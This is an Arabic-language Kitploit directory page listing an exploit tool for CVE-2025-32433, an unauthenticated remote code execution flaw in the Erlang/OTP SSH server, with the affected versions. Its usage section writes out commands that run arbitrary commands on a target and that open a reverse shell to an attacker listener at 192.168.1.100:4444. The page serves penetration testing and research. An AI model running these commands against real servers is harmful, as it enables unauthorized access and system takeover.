Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32433 — CVE-2025-32433 أداة استغلال ثغرة تنفيذ الأوامر عن بعد في Erlang/OTP SSH | Kitploit
أدوات/GitHubGitHub/0x7556/cve-2025-32433
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHub0x7556/cve-2025-32433

CVE-2025-32433

CVE-2025-32433 أداة استغلال ثغرة تنفيذ الأوامر عن بعد في Erlang/OTP SSH

عرض المستودع
31منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32433 استغلال RCE عبر SSH في Erlang/OTP

الوصف

تم تحديد ثغرة خطيرة في خادم SSH الخاص بـ Erlang/OTP قد تسمح للمهاجم بتنفيذ تعليمات برمجية عن بعد (RCE) دون مصادقة. من خلال استغلال خلل في معالجة رسائل بروتوكول SSH، يمكن للمهاجم الضار الحصول على وصول غير مصرح به إلى الأنظمة المتأثرة وتنفيذ أوامر عشوائية دون بيانات اعتماد صالحة. قد يؤدي ذلك إلى اختراق هذه المضيفات، مما يسمح بالوصول غير المصرح به إلى البيانات الحساسة والتلاعب بها من قبل أطراف ثالثة، أو هجمات رفض الخدمة.

الإصدارات المتأثرة

root@kitploit:~
OTP-27.3.2 والإصدارات الأقدم
OTP-26.2.5.10 والإصدارات الأقدم
OTP-25.3.2.19 والإصدارات الأقدم

الميزات

  • تنفيذ الاستغلال: تنفيذ أوامر عشوائية.
  • شل عكسي: بدء شل عكسي قائم على bash.

الاستخدام

تنفيذ أمر:

root@kitploit:~
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'

بدء شل عكسي:

root@kitploit:~
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

CVE-2025-32433

المراجع

إشعار GitHub

CVE-2025-32433 في NVD

منصة الأمان

https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

إخلاء المسؤولية

  • باستخدام هذه الأداة، يرجى الالتزام بالقوانين واللوائح ذات الصلة، وضمان الاختبار والاستخدام في بيئات مصرح بها.
  • هذه الأداة مخصصة لأغراض التعليم والبحث فقط، وأي إساءة استخدام ستكون على مسؤولية المستخدم.
تنزيل الأداة